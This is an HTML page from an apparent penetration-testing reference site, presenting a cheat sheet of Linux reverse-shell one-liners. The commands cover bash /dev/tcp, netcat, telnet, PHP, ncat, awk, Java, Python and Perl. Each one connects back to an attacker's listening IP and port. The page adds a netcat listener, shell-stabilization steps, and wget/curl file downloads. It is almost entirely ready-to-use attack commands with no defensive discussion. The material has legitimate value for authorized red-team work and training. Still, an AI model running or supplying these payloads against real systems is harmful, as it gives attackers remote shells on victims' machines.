<!DOCTYPE html>
<html>
<head>
<title>CST</title>
<link rel="icon" href="icon.ico">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Cyber">
<meta name="keywords" content="Hacking, Penetration Test, Vulnerability Assessment, Cyber, CTF, CST">
<style>
body {
  font-family: "Lato", sans-serif;
  background-color: #191919;
  color: #f1f1f1;

  background-repeat: no-repeat;
  background-attachment: fixed;
  background-size: cover;
}

.sidenav {
  height: 100%;
  width: 0;
  position: fixed;
  z-index: 1;
  top: 0;
  left: 0;
  background-color: #202124;
  background-image: url('bg.jpg');
  overflow-x: hidden;
  transition: 0s;
  padding-top: 20px;
}

.sidenav a {
  padding: 1px 1px 1px 12px;
  text-decoration: none;
  font-size: 14px;
  color: #818181;
  display: block;
  transition: 0s;
}

.sidenav a:hover {
  color: #f1f1f1;
}

.sidenav .closebtn {
  position: absolute;
  top: 0;
  right: 25px;
  font-size: 36px;
  margin-left: 50px;
}

.main {
  margin-left: 160px; 
  font-size: 20px; 
  padding: 0px 10px;
}

.text.center {
	text-align: center;
}

.bottomright {
  position: fixed;
  bottom: 0;
  right: 0;
  color: white;
  padding: 10px 10px;
  font-size: 30px; 
}

@media screen and (max-height: 450px) {
  .sidenav {padding-top: 15px;}
  .sidenav a {font-size: 12px;}
}

hr { 
	display: block; 
	height: 1px;
    border: 0; 
    border-top: 1px solid black;
    margin: 1em 0; 
    padding: 0; 
}

#rcorners {
  border-radius: 15px;
  background: #2e2d2e;
  padding: 10px; 
  width: 80%;
  height: auto;
  word-wrap: break-word;
}

#divtitle {
  height: auto;
  width: 50%;
}

div.trans {
  opacity: 0.6;
}

/*
div {
  border: double;
}
*/

</style>
</head>
<body>
<a name="top"></a>
<div id="mySidenav" class="sidenav">
  <a href="javascript:void(0)" class="closebtn" onclick="closeNav()">&times;</a>
  <a href="index.html"><b>Home</a>
  <hr>
  <a href="nmap.html">Nmap</a>
  <hr>
  <a href="exploit.html">Search for exploits</a>
  <hr>
  <a href="brutef.html">Brute Force</a>
  <hr>
  <a href="hex.html">Hex and Headers</a>
  <hr>
  <a href="wrevshell.html">Windows Reverse Shells</a>
  <hr>
  <a href="lrevshell.html">Linux Reverse Shells</a>
  <hr>
  <a href="pel.html">Linux Penetration</a>
  <hr>
  <a href="pew.html">Windows Penetration</a>
  <hr>
  <a href="ctf.html">Mini-CTF</a>
  <hr>
  <a href="contact.html">Contact</a>
  <hr>
  <a href="Anti-Virus-Test.html">AV Test</b></a>
  <hr>
  <hr>
</div>

<div id="main">
  <span style="font-size:30px;cursor:pointer" onclick="openNav()">&#9776;</span>
</div>

<center><div id="divtitle">
<img src="logox.png" height=100px></img>
<br>
<br>
<br>
</div></center>

<center><div id="rcorners" class="trans">
  <h3>LINUX REVERSE SHELLS</h3>
  <img src="search.png" width=200px>
  <p>The following are ways to get reverse shells back to your red team device. All IP and PORT should be changed to your listening box</p>
  <hr>
  <h4 style="text-align: left">PWNCAT</h4>
  <p style="text-align: left">Amazing raw bind and reverse shell handler!</p>
  <p style="text-align: left">You can find it on their Github <a href="https://github.com/CalebStewart/pwncat" style="text-decoration: none; color: white"> - CLICK HERE</b></a></p>
  <hr>
  <h4 style="text-align: left">Bash</h4>
  <p style="text-align: left">bash -i >& /dev/tcp/IP/PORT 0>&1 </p>
  <p style="text-align: left">or </p>
  <p style="text-align: left">nohup bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' </p>
  <hr>
  <h4 style="text-align: left">NC</h4>
  <p style="text-align: left">nc -e /bin/sh IP PORT</p>
  <p style="text-align: left">or</p>
  <p style="text-align: left">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f </p>
  <hr> 
  <h4 style="text-align: left">NC listener</h4>
  <p style="text-align: left">nc -v -n -l -p PORT</p>
  <hr>
  <h4 style="text-align: left">Telnet</h4>
  <p style="text-align: left">telnet IP PORT | /bin/bash | telnet IP PORT</p>
  <hr>
  <h4 style="text-align: left">PHP</h4>
  <p style="text-align: left">php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' </p>
  <hr>
  <h4 style="text-align: left">Ncat</h4>
  <p style="text-align: left">ncat --exec cmd.exe --allow IP -vnl 5555 --ssl </p>
  <p style="text-align: left">On red team box do: ncat -v targetIP 5555 --ssl</p>
  <hr>  
  <h4 style="text-align: left">Awk</h4>
  <p style="text-align: left">awk 'BEGIN {s = "/inet/tcp/0/IP/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null </p>
  <hr>
  <h4 style="text-align: left">Java</h4>
  <p style="text-align: left">r = Runtime.getRuntime() </p>
  <p style="text-align: left">p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) </p>
  <p style="text-align: left">p.waitFor() </p>
  <hr> 
  <h4 style="text-align: left">Python</h4>
  <p style="text-align: left">python -c 'import </p>
  <p style="text-align: left">socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' </p>
  <hr>
  <h4 style="text-align: left">Perl</h4>
  <p style="text-align: left">perl -e 'use  </p>
  <p style="text-align: left">Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' </p>
  <hr> 
  <h4 style="text-align: left">Stabilize your shell</h4>
  <p style="text-align: left">On target box:</p>
  <p style="text-align: left">python -c "import pty; pty.spawn('/bin/bash')" </p>
  <p style="text-align: left">CTRL + Z </p>
  <p style="text-align: left">On your box: </p>
  <p style="text-align: left">stty raw -echo</p>
  <p style="text-align: left">fg</p>
  <p style="text-align: left">On target box:</p>
  <p style="text-align: left">export TERM=xterm</p>
  <hr> 
  <h4 style="text-align: left">Quick web HTTP share of current directory</h4>
  <p style="text-align: left">python -m SimpleHTTPServer 80</p>
  <p style="text-align: left">or</p>
  <p style="text-align: left">python3 -m http.server 8080</p>
  <hr>  
  <h4 style="text-align: left">Use wget to download a file</h4>
  <p style="text-align: left">wget https://address/file</p>
  <hr> 
  <h4 style="text-align: left">Use curl to download a file</h4>
  <p style="text-align: left">curl https://address/file.sh --output file.sh</p>
  <hr> 
  
</div></center>

<a class="bottomright" href="#top" style="text-decoration: none; color: white;"><b>&#8682;</b></a>

<script>
function openNav() {
  document.getElementById("mySidenav").style.width = "250px";
}

function closeNav() {
  document.getElementById("mySidenav").style.width = "0";
}
</script>

</body>
</html> 
